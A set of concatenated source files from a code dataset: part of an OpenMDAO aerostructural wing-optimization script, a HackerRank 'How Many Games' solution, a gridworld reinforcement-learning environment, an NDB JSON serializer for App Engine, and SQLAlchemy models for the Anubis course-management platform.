dvs = self.add_subsystem('dvs', om.IndepVarComp(), promotes=['*'])
dvs.add_output('aoa', val=[aoa0,aoa1], units='deg')
dvs.add_output('mach', mach)
dvs.add_output('q_inf', q_inf)
dvs.add_output('vel', vel)
dvs.add_output('nu', nu)
self.add_subsystem('mesh_aero',aero_builder.get_mesh_coordinate_subsystem())
# TACS
tacs_options = {'element_callback': tacs_setup.element_callback,
'problem_setup': tacs_setup.problem_setup,
'mesh_file': 'wingbox_Y_Z_flip.bdf'}
struct_builder = TacsBuilder(tacs_options)
struct_builder.initialize(self.comm)
self.add_subsystem('mesh_struct',struct_builder.get_mesh_coordinate_subsystem())
initial_thickness = 0.003
dvs.add_output('ribs', val=initial_thickness, shape = struct_comps['ribs'])
dvs.add_output('le_spar', val=initial_thickness, shape = struct_comps['le_spar'])
dvs.add_output('te_spar', val=initial_thickness, shape = struct_comps['te_spar'])
dvs.add_output('up_skin', val=initial_thickness, shape = struct_comps['up_skin'])
dvs.add_output('lo_skin', val=initial_thickness, shape = struct_comps['lo_skin'])
dvs.add_output('up_stringer', val=initial_thickness, shape = struct_comps['up_stringer'])
dvs.add_output('lo_stringer', val=initial_thickness, shape = struct_comps['lo_stringer'])
self.add_subsystem('struct_mapper',StructDvMapper(), promotes=['*'])
# MELD setup
isym = 1
ldxfer_builder = MeldBuilder(aero_builder, struct_builder, isym=isym)
ldxfer_builder.initialize(self.comm)
for iscen, scenario in enumerate(['cruise','maneuver']):
nonlinear_solver = om.NonlinearBlockGS(maxiter=25, iprint=2, use_aitken=True, rtol = 1E-14, atol=1E-14)
linear_solver = om.LinearBlockGS(maxiter=25, iprint=2, use_aitken=True, rtol = 1e-14, atol=1e-14)
self.mphys_add_scenario(scenario,ScenarioAeroStructural(aero_builder=aero_builder,
struct_builder=struct_builder,
ldxfer_builder=ldxfer_builder),
nonlinear_solver, linear_solver)
for discipline in ['aero','struct']:
self.mphys_connect_scenario_coordinate_source('mesh_%s' % discipline, scenario, discipline)
for dv in ['q_inf','vel','nu','mach','dv_struct']:
self.connect(dv, f'{scenario}.{dv}')
self.connect('aoa', f'{scenario}.aoa', src_indices=[iscen])
self.add_subsystem('le_spar_smoothness',SmoothnessEvaluatorGrid(columns=struct_comps['le_spar'],rows=1))
self.add_subsystem('te_spar_smoothness',SmoothnessEvaluatorGrid(columns=struct_comps['te_spar'],rows=1))
self.add_subsystem('up_skin_smoothness',SmoothnessEvaluatorGrid(columns=9,rows=struct_comps['up_skin']//9))
self.add_subsystem('lo_skin_smoothness',SmoothnessEvaluatorGrid(columns=9,rows=int(struct_comps['lo_skin']/9)))
self.connect('le_spar','le_spar_smoothness.thickness')
self.connect('te_spar','te_spar_smoothness.thickness')
self.connect('up_skin','up_skin_smoothness.thickness')
self.connect('lo_skin','lo_skin_smoothness.thickness')
################################################################################
# OpenMDAO setup
################################################################################
prob = om.Problem()
prob.model = Top()
model = prob.model
# optimization set up
prob.model.add_design_var('aoa',lower=-5*np.pi/180, upper=10*np.pi/180.0, ref=1.0, units='rad')
prob.model.add_design_var('ribs', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('le_spar', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('te_spar', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('up_skin', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('lo_skin', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('up_stringer', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('lo_stringer', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_objective('cruise.mass',ref=1000.0)
prob.model.add_constraint('cruise.C_L',ref=1.0,equals=0.5)
prob.model.add_constraint('maneuver.C_L',ref=1.0,equals=0.9)
prob.model.add_constraint('maneuver.ks_vmfailure',ref=1.0, upper = 2.0/3.0)
prob.model.add_constraint('le_spar_smoothness.diff', ref=1e-3, upper = 0.0, linear=True)
prob.model.add_constraint('te_spar_smoothness.diff', ref=1e-3, upper = 0.0, linear=True)
prob.model.add_constraint('up_skin_smoothness.diff', ref=1e-3, upper = 0.0, linear=True)
prob.model.add_constraint('lo_skin_smoothness.diff', ref=1e-3, upper = 0.0, linear=True)
#prob.driver = om.ScipyOptimizeDriver(debug_print=['ln_cons','nl_cons','objs','totals'])
prob.driver = om.ScipyOptimizeDriver()
prob.driver.options['optimizer'] = 'SLSQP'
prob.driver.options['tol'] = 1e-8
prob.driver.options['disp'] = True
prob.driver.recording_options['includes'] = ['*']
prob.driver.recording_options['record_objectives'] = True
prob.driver.recording_options['record_constraints'] = True
prob.driver.recording_options['record_desvars'] = True
recorder = om.SqliteRecorder("cases.sql")
prob.driver.add_recorder(recorder)
prob.setup(mode='rev')
om.n2(prob, show_browser=False, outfile='mphys_as_vlm.html')
if check_derivs:
prob.run_model()
prob.check_totals(of=['cruise.mass','cruise.C_L','maneuver.ks_vmfailure'],
wrt=['aoa','ribs'])
else:
prob.run_driver()
cr = om.CaseReader('cases.sql')
driver_cases = cr.list_cases('driver')
matrix = np.zeros((len(driver_cases),4))
for i, case_id in enumerate(driver_cases):
matrix[i,0] = i
case = cr.get_case(case_id)
matrix[i,1] = case.get_objectives()['cruise.mass'][0]
matrix[i,2] = case.get_constraints()['cruise.C_L'][0]
matrix[i,3] = case.get_constraints()['maneuver.ks_vmfailure'][0]
np.savetxt('history.dat',matrix)
|
the-stack_0_1683 | # You wish to buy video games from the famous online video game store Mist.
# Usually, all games are sold at the same price, p dollars. However, they are planning to have the seasonal
# Halloween Sale next month in which you can buy games at a cheaper price. Specifically, the first game you
# buy during the sale will be sold at p dollars, but every subsequent game you buy will be sold at exactly d dollars less than the
# cost of the previous one you bought. This will continue until the cost becomes less than or equal to m dollars,
# after which every game you buy will cost m dollars each.
# For example, if p = 20, d = 3 and m = 6 then the following are the
# costs of the first 11 games you buy, in order:
# 20, 17, 14, 11, 8, 6, 6, 6, 6, 6, 6
# You have s dollars in your Mist wallet.
# How many games can you buy during the Halloween Sale?
# Input Format
# The first and only line of input contains four space-separated integers
# p, d, m and s.
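# Equivalently, the prices form the arithmetic sequence p, p-d, p-2d, ... until a
# price would drop to m or below, after which every further game costs m; the code
# below simply simulates that sequence for as long as the wallet balance s allows.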
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the howManyGames function below.
def howManyGames(p, d, m, s):
# Return the number of games you can buy
l = []
n = p # Creating n from p (contains the remaining values)
if l == [] and p <= s:
l.append(p)
elif p > s:
return 0
n -= d
if (sum(l) + n) > s:
return len(l)
while n > m and (sum(l) + n) <= s:
l.append(n)
n -= d
while sum(l) + m <= s:
l.append(m)
n -= m
print(l)
return len(l)
if __name__ == "__main__":
fptr = open(os.environ["OUTPUT_PATH"], "w")
pdms = input().split()
p = int(pdms[0]) # Games sold at same price
d = int(pdms[1]) # d dollars less than previous one
m = int(pdms[2]) # less less than m
s = int(pdms[3])
answer = howManyGames(p, d, m, s)
fptr.write(str(answer) + "\n")
fptr.close()
# Output Format
# Print a single line containing a single integer denoting the maximum number of
# games you can buy.
# Sample Input 0
# 20 3 6 80
# Sample Output 0
# 6
# Explanation 0
# We have p = 20, d = 3 and m = 6, the same as in the problem statement.
# We also have dollars s = 80. We can buy 6 games since they cost 20 + 17 + 14 + 11 + 8 + 6 = 76 dollars.
# However, we cannot buy a 7th game. Thus, the answer is 6.
# Sample Input 1
# 20 3 6 85
# Sample Output 1
# 7
# Explanation 1
# This is the same as the previous case, except this time we have s = 85
# dollars. This time, we can buy 7 games since they cost 20 + 17 + 14 + 11 + 8 + 6 + 6 = 82 dollars.
# However, we cannot buy an 8th game. Thus, the answer is 7.
|
the-stack_0_1684 | import numpy as np
import random
import itertools
import scipy.misc
from PIL import Image
import matplotlib.pyplot as plt
class gameOb():
def __init__(self,coordinates,size,intensity,channel,reward,name):
self.x = coordinates[0]
self.y = coordinates[1]
self.size = size
self.intensity = intensity
self.channel = channel
self.reward = reward
self.name = name
class gameEnv():
def __init__(self,partial,size):
self.sizeX = size
self.sizeY = size
self.actions = 4
self.objects = []
self.partial = partial
a = self.reset()
plt.imshow(a,interpolation="nearest")
plt.axis("off")
def reset(self):
self.objects = []
hero = gameOb(self.newPosition(),1,1,2,None,'hero')
self.objects.append(hero)
bug = gameOb(self.newPosition(),1,1,1,1,'goal')
self.objects.append(bug)
hole = gameOb(self.newPosition(),1,1,0,-1,'fire')
self.objects.append(hole)
bug2 = gameOb(self.newPosition(),1,1,1,1,'goal')
self.objects.append(bug2)
hole2 = gameOb(self.newPosition(),1,1,0,-1,'fire')
self.objects.append(hole2)
bug3 = gameOb(self.newPosition(),1,1,1,1,'goal')
self.objects.append(bug3)
bug4 = gameOb(self.newPosition(),1,1,1,1,'goal')
self.objects.append(bug4)
state = self.renderEnv()
self.state = state
return state
def moveChar(self,direction):
# 0 - up, 1 - down, 2 - left, 3 - right
hero = self.objects[0]
heroX = hero.x
heroY = hero.y
penalize = 0.
if direction == 0 and hero.y >= 1:
hero.y -= 1
if direction == 1 and hero.y <= self.sizeY-2:
hero.y += 1
if direction == 2 and hero.x >= 1:
hero.x -= 1
if direction == 3 and hero.x <= self.sizeX-2:
hero.x += 1
if hero.x == heroX and hero.y == heroY:
penalize = 0.0
self.objects[0] = hero
return penalize
def newPosition(self):
iterables = [ range(self.sizeX), range(self.sizeY)]
points = []
for t in itertools.product(*iterables):
points.append(t)
currentPositions = []
for objectA in self.objects:
if (objectA.x,objectA.y) not in currentPositions:
currentPositions.append((objectA.x,objectA.y))
for pos in currentPositions:
points.remove(pos)
location = np.random.choice(range(len(points)),replace=False)
return points[location]
def checkGoal(self):
others = []
for obj in self.objects:
if obj.name == 'hero':
hero = obj
else:
others.append(obj)
ended = False
for other in others:
if hero.x == other.x and hero.y == other.y:
self.objects.remove(other)
if other.reward == 1:
self.objects.append(gameOb(self.newPosition(),1,1,1,1,'goal'))
else:
self.objects.append(gameOb(self.newPosition(),1,1,0,-1,'fire'))
return other.reward,False
if ended == False:
return 0.0,False
def renderEnv(self):
#a = np.zeros([self.sizeY,self.sizeX,3])
a = np.ones([self.sizeY+2,self.sizeX+2,3])
a[1:-1,1:-1,:] = 0
hero = None
for item in self.objects:
a[item.y+1:item.y+item.size+1,item.x+1:item.x+item.size+1,item.channel] = item.intensity
if item.name == 'hero':
hero = item
if self.partial == True:
a = a[hero.y:hero.y+3,hero.x:hero.x+3,:]
b = Image.fromarray(np.uint8(a[:,:,0]*255), mode="L").resize((84,84), resample=Image.NEAREST)
c = Image.fromarray(np.uint8(a[:,:,1]*255), mode="L").resize((84,84), resample=Image.NEAREST)
d = Image.fromarray(np.uint8(a[:,:,2]*255), mode="L").resize((84,84), resample=Image.NEAREST)
a = np.stack([b,c,d],axis=2)
return a
def step(self,action):
penalty = self.moveChar(action)
reward,done = self.checkGoal()
state = self.renderEnv()
if reward == None:
print(done)
print(reward)
print(penalty)
return state,(reward+penalty),done
else:
return state,(reward+penalty),done |
the-stack_0_1686 | # -*- coding: utf-8 -*-
"""
JSON encoder/decoder adapted for use with Google App Engine NDB.
Usage:
import ndb_json
# Serialize an ndb.Query into an array of JSON objects.
query = models.MyModel.query()
query_json = ndb_json.dumps(query)
# Convert into a list of Python dictionaries.
query_dicts = ndb_json.loads(query_json)
# Serialize an ndb.Model instance into a JSON object.
entity = query.get()
entity_json = ndb_json.dumps(entity)
# Convert into a Python dictionary.
entity_dict = ndb_json.loads(entity_json)
Dependencies:
- dateutil: https://pypi.python.org/pypi/python-dateutil
"""
__author__ = 'Eric Higgins'
__copyright__ = 'Copyright 2013-2016, Eric Higgins'
__email__ = '[email protected]'
import base64
import datetime
import json
import time
import types
import dateutil.parser
from google.appengine.ext import ndb
__all__ = (
'dump',
'dumps',
'loads',
'NdbDecoder',
'NdbEncoder',
)
def encode_model(obj):
"""Encode objects like ndb.Model which have a `.to_dict()` method."""
obj_dict = obj.to_dict()
for key, val in obj_dict.iteritems():
if isinstance(val, types.StringType):
try:
unicode(val)
except UnicodeDecodeError:
# Encode binary strings (blobs) to base64.
obj_dict[key] = base64.b64encode(val)
return obj_dict
def encode_generator(obj):
"""Encode generator-like objects, such as ndb.Query."""
return list(obj)
def encode_key_as_entity(obj):
"""Get the Entity from the ndb.Key for further encoding."""
# NOTE(erichiggins): Potentially poor performance for Models w/ many KeyProperty properties.
# NOTE(ronufryk): Potentially can cause circular references and "RuntimeError: maximum recursion depth exceeded"
return obj.get_async()
# Alias for backward-compatibility
encode_key = encode_key_as_entity
def encode_key_as_pair(obj):
"""Get the ndb.Key as a tuple of (kind, id) pairs."""
return obj.pairs()
def encode_key_as_urlsafe(obj):
"""Get the ndb.Key as URL-safe base64-encoded string."""
return obj.urlsafe()
def encode_future(obj):
"""Encode an ndb.Future instance."""
return obj.get_result()
def encode_datetime(obj):
"""Encode a datetime.datetime or datetime.date object as an ISO 8601 format string."""
# Reformat the date slightly for better JS compatibility.
# Offset-naive dates need 'Z' appended for JS.
# datetime.date objects don't have or need tzinfo, so don't append 'Z'.
zone = '' if getattr(obj, 'tzinfo', True) else 'Z'
return obj.isoformat() + zone
def encode_complex(obj):
"""Convert a complex number object into a list containing the real and imaginary values."""
return [obj.real, obj.imag]
def encode_basevalue(obj):
"""Retrieve the actual value from a ndb.model._BaseValue.
This is a convenience function to assist with the following issue:
https://code.google.com/p/appengine-ndb-experiment/issues/detail?id=208
"""
return obj.b_val
NDB_TYPE_ENCODING = {
ndb.MetaModel: encode_model,
ndb.Query: encode_generator,
ndb.QueryIterator: encode_generator,
ndb.Key: encode_key_as_entity,
ndb.Future: encode_future,
datetime.date: encode_datetime,
datetime.datetime: encode_datetime,
time.struct_time: encode_generator,
types.ComplexType: encode_complex,
ndb.model._BaseValue: encode_basevalue,
}
# Sort the types so any iteration is in a deterministic order
NDB_TYPES = sorted(NDB_TYPE_ENCODING.keys(), key=lambda t: t.__name__)
class NdbDecoder(json.JSONDecoder):
"""Extend the JSON decoder to add support for datetime objects."""
def __init__(self, **kwargs):
"""Override the default __init__ in order to specify our own parameters."""
json.JSONDecoder.__init__(self, object_hook=self.object_hook_handler, **kwargs)
def object_hook_handler(self, val):
"""Handles decoding of nested date strings."""
return {k: self.decode_date(v) for k, v in val.iteritems()}
def decode_date(self, val):
"""Tries to decode strings that look like dates into datetime objects."""
if isinstance(val, basestring) and val.count('-') == 2 and len(val) > 9:
try:
dt = dateutil.parser.parse(val)
# Check for UTC.
if val.endswith(('+00:00', '-00:00', 'Z')):
# Then remove tzinfo for gae, which is offset-naive.
dt = dt.replace(tzinfo=None)
return dt
except (TypeError, ValueError):
pass
return val
def decode(self, val):
"""Override of the default decode method that also uses decode_date."""
# First try the date decoder.
new_val = self.decode_date(val)
if val != new_val:
return new_val
# Fall back to the default decoder.
return json.JSONDecoder.decode(self, val)
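# --- Illustrative sketch (added for exposition; not part of the original ---
# module). Shows how the date heuristic in ``NdbDecoder.decode_date`` treats
# a few inputs, assuming the Python 2 / dateutil environment this module
# targets.
def _example_decode_date():
    decoder = NdbDecoder()
    # UTC timestamps are parsed and made offset-naive for App Engine.
    assert (decoder.decode_date('2016-01-02T03:04:05Z') ==
            datetime.datetime(2016, 1, 2, 3, 4, 5))
    # Date-like but unparseable strings fall through unchanged.
    assert decoder.decode_date('not-a-date') == 'not-a-date'
    # Short strings are never treated as dates.
    assert decoder.decode_date('1-2-3') == '1-2-3'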
class NdbEncoder(json.JSONEncoder):
"""Extend the JSON encoder to add support for NDB Models."""
def __init__(self, **kwargs):
self._ndb_type_encoding = NDB_TYPE_ENCODING.copy()
keys_as_entities = kwargs.pop('ndb_keys_as_entities', False)
keys_as_pairs = kwargs.pop('ndb_keys_as_pairs', False)
keys_as_urlsafe = kwargs.pop('ndb_keys_as_urlsafe', False)
# Validate that only one of three flags is True
if ((keys_as_entities and keys_as_pairs)
or (keys_as_entities and keys_as_urlsafe)
or (keys_as_pairs and keys_as_urlsafe)):
raise ValueError('Only one of arguments ndb_keys_as_entities, ndb_keys_as_pairs, ndb_keys_as_urlsafe can be True')
if keys_as_pairs:
self._ndb_type_encoding[ndb.Key] = encode_key_as_pair
elif keys_as_urlsafe:
self._ndb_type_encoding[ndb.Key] = encode_key_as_urlsafe
else:
self._ndb_type_encoding[ndb.Key] = encode_key_as_entity
json.JSONEncoder.__init__(self, **kwargs)
def default(self, obj):
"""Overriding the default JSONEncoder.default for NDB support."""
obj_type = type(obj)
# NDB Models return a repr to calls from type().
if obj_type not in self._ndb_type_encoding:
if hasattr(obj, '__metaclass__'):
obj_type = obj.__metaclass__
else:
# Try to encode subclasses of types
for ndb_type in NDB_TYPES:
if isinstance(obj, ndb_type):
obj_type = ndb_type
break
fn = self._ndb_type_encoding.get(obj_type)
if fn:
return fn(obj)
return json.JSONEncoder.default(self, obj)
def dumps(ndb_model, **kwargs):
"""Custom json dumps using the custom encoder above."""
return NdbEncoder(**kwargs).encode(ndb_model)
def dump(ndb_model, fp, **kwargs):
"""Custom json dump using the custom encoder above."""
for chunk in NdbEncoder(**kwargs).iterencode(ndb_model):
fp.write(chunk)
def loads(json_str, **kwargs):
"""Custom json loads function that converts datetime strings."""
return NdbDecoder(**kwargs).decode(json_str)
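# --- Illustrative sketch (added for exposition; not part of the original ---
# module). The three mutually exclusive key-encoding flags accepted by
# ``dumps``; ``entity`` is assumed to be any ndb.Model instance containing a
# KeyProperty.
def _example_key_encodings(entity):
    as_entities = dumps(entity)                           # keys expanded into the referenced entities (default)
    as_pairs = dumps(entity, ndb_keys_as_pairs=True)      # keys as ((kind, id), ...) pairs
    as_urlsafe = dumps(entity, ndb_keys_as_urlsafe=True)  # keys as URL-safe base64 strings
    return as_entities, as_pairs, as_urlsafe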
|
the-stack_0_1689 | import base64
import copy
import os
from datetime import datetime, timedelta
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.orm import deferred
from sqlalchemy_json import MutableJson
from anubis.utils.data import rand
db = SQLAlchemy()
THEIA_DEFAULT_OPTIONS = {
"autosave": True,
"persistent_storage": False,
"network_policy": "os-student",
"resources": {
"requests": {"cpu": "300m", "memory": "300Mi"},
"limits": {"cpu": "2", "memory": "500Mi"},
},
}
def default_id(max_len=None) -> db.Column:
return db.Column(
db.String(128), primary_key=True, default=lambda: rand(max_len or 32)
)
class Config(db.Model):
__tablename__ = "anubis_config"
# Fields
key = db.Column(db.String(128), primary_key=True)
value = db.Column(db.String(2048))
@property
def data(self):
return {
"key": self.key,
"value": self.value,
}
class User(db.Model):
__tablename__ = "user"
# id
id = default_id()
# Fields
netid = db.Column(db.String(128), primary_key=True, unique=True, index=True)
github_username = db.Column(db.TEXT, index=True)
name = db.Column(db.TEXT)
is_superuser = db.Column(db.Boolean, nullable=False, default=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
ta_for_course = db.relationship(
"TAForCourse", cascade="all,delete", backref="owner"
)
professor_for_course = db.relationship(
"ProfessorForCourse", cascade="all,delete", backref="owner"
)
in_course = db.relationship("InCourse", cascade="all,delete", backref="owner")
assignment_repos = db.relationship(
"AssignmentRepo", cascade="all,delete", backref="owner"
)
assigned_student_questions = db.relationship(
"AssignedStudentQuestion", cascade="all,delete", backref="owner"
)
submissions = db.relationship("Submission", cascade="all,delete", backref="owner")
theia_sessions = db.relationship(
"TheiaSession", cascade="all,delete", backref="owner"
)
late_exceptions = db.relationship(
"LateException", cascade="all,delete", backref="user"
)
@property
def data(self):
from anubis.lms.courses import get_user_permissions
return {
"id": self.id,
"netid": self.netid,
"github_username": self.github_username,
"name": self.name,
**get_user_permissions(self),
}
def __repr__(self):
return self.__str__()
def __str__(self):
return f"<User {self.netid} {self.github_username}>"
class Course(db.Model):
__tablename__ = "course"
# id
id = default_id()
# Fields
name = db.Column(db.TEXT, nullable=False)
course_code = db.Column(db.TEXT, nullable=False)
semester = db.Column(db.TEXT, nullable=True)
section = db.Column(db.TEXT, nullable=True)
professor_display_name = db.Column(db.TEXT)
autograde_tests_repo = db.Column(
db.TEXT,
nullable=False,
default="https://github.com/os3224/anubis-assignment-tests",
)
github_repo_required = db.Column(db.Boolean, default=True)
theia_default_image = db.Column(
db.TEXT, nullable=False, default="registry.digitalocean.com/anubis/theia-xv6"
)
theia_default_options = db.Column(
MutableJson, default=lambda: copy.deepcopy(THEIA_DEFAULT_OPTIONS)
)
github_org = db.Column(db.TEXT, default="os3224")
join_code = db.Column(db.String(256), unique=True)
display_visuals = db.Column(db.Boolean, default=True)
assignments = db.relationship("Assignment", cascade="all,delete", backref="course")
ta_for_course = db.relationship(
"TAForCourse", cascade="all,delete", backref="course"
)
professor_for_course = db.relationship(
"ProfessorForCourse", cascade="all,delete", backref="course"
)
in_course = db.relationship("InCourse", cascade="all,delete", backref="course")
lecture_notes = db.relationship(
"LectureNotes", cascade="all,delete", backref="course"
)
static_files = db.relationship("StaticFile", cascade="all,delete", backref="course")
theia_sessions = db.relationship(
"TheiaSession", cascade="all,delete", backref="course"
)
@property
def total_assignments(self):
return self.open_assignments
@property
def open_assignments(self):
now = datetime.now()
return Assignment.query.filter(
Assignment.course_id == self.id,
Assignment.release_date <= now,
Assignment.hidden == False,
).count()
@property
def data(self):
return {
"id": self.id,
"name": self.name,
"course_code": self.course_code,
"section": self.section,
"professor_display_name": self.professor_display_name,
"total_assignments": self.total_assignments,
"open_assignment": self.open_assignments,
"join_code": self.id[:6],
}
class TAForCourse(db.Model):
__tablename__ = "ta_for_course"
# Foreign Keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id), primary_key=True)
course_id = db.Column(db.String(128), db.ForeignKey(Course.id), primary_key=True)
@property
def data(self):
return {
"id": self.course.id,
"name": self.course.name,
}
class ProfessorForCourse(db.Model):
__tablename__ = "professor_for_course"
# Foreign Keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id), primary_key=True)
course_id = db.Column(db.String(128), db.ForeignKey(Course.id), primary_key=True)
@property
def data(self):
return {
"id": self.course.id,
"name": self.course.name,
}
class InCourse(db.Model):
__tablename__ = "in_course"
# Foreign Keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id), primary_key=True)
course_id = db.Column(db.String(128), db.ForeignKey(Course.id), primary_key=True)
class Assignment(db.Model):
__tablename__ = "assignment"
# id
id = default_id()
# Foreign Keys
course_id = db.Column(db.String(128), db.ForeignKey(Course.id), index=True)
# Fields
name = db.Column(db.TEXT, nullable=False, index=True)
hidden = db.Column(db.Boolean, default=False)
description = db.Column(db.TEXT, nullable=True)
unique_code = db.Column(
db.String(8),
unique=True,
default=lambda: base64.b16encode(os.urandom(4)).decode().lower(),
)
accept_late = db.Column(db.Boolean, default=True)
hide_due_date = db.Column(db.Boolean, default=False)
questions_assigned = db.Column(db.Boolean, default=False)
# Autograde
pipeline_image = db.Column(db.TEXT, nullable=True, index=True)
autograde_enabled = db.Column(db.Boolean, default=True)
# IDE
ide_enabled = db.Column(db.Boolean, default=True)
theia_image = db.Column(
db.TEXT, default="registry.digitalocean.com/anubis/theia-xv6"
)
theia_options = db.Column(
MutableJson, default=lambda: copy.deepcopy(THEIA_DEFAULT_OPTIONS)
)
# Github
github_template = db.Column(db.TEXT, nullable=True, default="")
github_repo_required = db.Column(db.Boolean, default=False)
# Dates
release_date = db.Column(db.DateTime, nullable=False)
due_date = db.Column(db.DateTime, nullable=False)
grace_date = db.Column(db.DateTime, nullable=True)
assignment_questions = db.relationship(
"AssignmentQuestion", cascade="all,delete", backref="assignment"
)
assigned_student_questions = db.relationship(
"AssignedStudentQuestion", cascade="all,delete", backref="assignment"
)
submissions = db.relationship(
"Submission", cascade="all,delete", backref="assignment"
)
theia_sessions = db.relationship(
"TheiaSession", cascade="all,delete", backref="assignment"
)
late_exceptions = db.relationship(
"LateException", cascade="all,delete", backref="assignment"
)
tests = db.relationship(
"AssignmentTest", cascade="all,delete", backref="assignment"
)
repos = db.relationship(
"AssignmentRepo", cascade="all,delete", backref="assignment"
)
@property
def data(self):
return {
"id": self.id,
"name": self.name,
"due_date": str(self.due_date),
"past_due": self.due_date < datetime.now(),
"hidden": self.hidden,
"accept_late": self.accept_late,
"autograde_enabled": self.autograde_enabled,
"hide_due_date": self.hide_due_date,
"course": self.course.data,
"description": self.description,
"visible_to_students": not self.hidden
and (datetime.now() > self.release_date),
"ide_active": self.due_date + timedelta(days=3 * 7) > datetime.now(),
"tests": [t.data for t in self.tests if t.hidden is False],
# IDE
"ide_enabled": self.ide_enabled,
"autosave": self.theia_options.get("autosave", True),
"persistent_storage": self.theia_options.get("persistent_storage", False),
# Github
"github_repo_required": self.github_repo_required,
}
@property
def full_data(self):
data = self.data
data["tests"] = [t.data for t in self.tests]
return data
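# Illustrative sketch (added for exposition; not part of Anubis): ``data``
# omits hidden tests while ``full_data`` includes them, so a hypothetical
# view function could pick the serialization based on the caller's role.
def _example_assignment_view(assignment, is_admin):
    return assignment.full_data if is_admin else assignment.data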
class AssignmentRepo(db.Model):
__tablename__ = "assignment_repo"
# id
id = default_id()
# Foreign Keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id), nullable=True)
assignment_id = db.Column(
db.String(128), db.ForeignKey(Assignment.id), nullable=False
)
# Fields
github_username = db.Column(db.TEXT, nullable=False)
repo_url = db.Column(db.String(512), nullable=False)
# State booleans
repo_created = db.Column(db.Boolean, default=False)
collaborator_configured = db.Column(db.Boolean, default=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
return {
"id": self.id,
"github_username": self.github_username,
"assignment_id": self.assignment_id,
"assignment_name": self.assignment.name,
"ready": self.repo_created and self.collaborator_configured,
"course_code": self.assignment.course.course_code,
"repo_url": self.repo_url,
}
class AssignmentTest(db.Model):
__tablename__ = "assignment_test"
# id
id = default_id()
# Foreign Keys
assignment_id = db.Column(db.String(128), db.ForeignKey(Assignment.id))
# Fields
name = db.Column(db.TEXT, index=True)
hidden = db.Column(db.Boolean, default=False)
@property
def data(self):
return {"id": self.id, "name": self.name, "hidden": self.hidden}
class AssignmentQuestion(db.Model):
__tablename__ = "assignment_question"
# id
id = default_id()
# Foreign Keys
assignment_id = db.Column(db.String(128), db.ForeignKey(Assignment.id), index=True)
# Fields
question = db.Column(db.Text, nullable=False)
solution = db.Column(db.Text, nullable=True)
pool = db.Column(db.Integer, index=True, nullable=False)
code_question = db.Column(db.Boolean, default=False)
code_language = db.Column(db.TEXT, nullable=True, default="")
placeholder = db.Column(db.Text, nullable=True, default="")
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
shape = {"question": str, "solution": str, "pool": int}
@property
def full_data(self):
return {
"id": self.id,
"question": self.question,
"code_question": self.code_question,
"code_language": self.code_language,
"solution": self.solution,
"pool": self.pool,
}
@property
def data(self):
return {
"id": self.id,
"question": self.question,
"code_question": self.code_question,
"code_language": self.code_language,
"pool": self.pool,
}
class AssignedStudentQuestion(db.Model):
__tablename__ = "assigned_student_question"
# id
id = default_id()
# Foreign Keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id))
assignment_id = db.Column(
db.String(128), db.ForeignKey(Assignment.id), index=True, nullable=False
)
question_id = db.Column(
db.String(128), db.ForeignKey(AssignmentQuestion.id), index=True, nullable=False
)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
# Relationships
question = db.relationship(AssignmentQuestion)
responses = db.relationship(
"AssignedQuestionResponse", cascade="all,delete", backref="question"
)
@property
def data(self):
"""
Returns simple dictionary representation of the object.
:return:
"""
response: AssignedQuestionResponse = (
AssignedQuestionResponse.query.filter(
AssignedQuestionResponse.assigned_question_id == self.id,
)
.order_by(AssignedQuestionResponse.created.desc())
.first()
)
response_data = {
"submitted": None,
"late": True,
"text": self.question.placeholder,
}
if response is not None:
response_data = response.data
return {
"id": self.id,
"response": response_data,
"question": self.question.data,
}
@property
def full_data(self):
data = self.data
data["question"] = self.question.full_data
return data
class AssignedQuestionResponse(db.Model):
__tablename__ = "assigned_student_response"
# id
id = default_id()
# Foreign Keys
assigned_question_id = db.Column(
db.String(128),
db.ForeignKey(AssignedStudentQuestion.id),
index=True,
nullable=False,
)
# Fields
response = db.Column(db.TEXT, default="", nullable=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
from anubis.lms.assignments import get_assignment_due_date
return {
"submitted": str(self.created),
"late": get_assignment_due_date(
self.question.owner.id, self.question.assignment.id
)
< self.created,
"text": self.response,
}
class Submission(db.Model):
__tablename__ = "submission"
# id
id = default_id()
# Foreign Keys
owner_id = db.Column(
db.String(128), db.ForeignKey(User.id), index=True, nullable=True
)
assignment_id = db.Column(
db.String(128), db.ForeignKey(Assignment.id), index=True, nullable=False
)
assignment_repo_id = db.Column(
db.String(128), db.ForeignKey(AssignmentRepo.id), nullable=False
)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
# Fields
commit = db.Column(db.String(128), unique=True, index=True, nullable=False)
processed = db.Column(db.Boolean, default=False)
state = db.Column(db.TEXT, default="")
errors = db.Column(MutableJson, default=None, nullable=True)
token = db.Column(
db.String(64), default=lambda: base64.b16encode(os.urandom(32)).decode()
)
accepted = db.Column(db.Boolean, default=True)
# Relationships
build = db.relationship(
"SubmissionBuild",
cascade="all,delete",
uselist=False,
backref="submission",
lazy=False,
)
test_results = db.relationship(
"SubmissionTestResult", cascade="all,delete", backref="submission", lazy=False
)
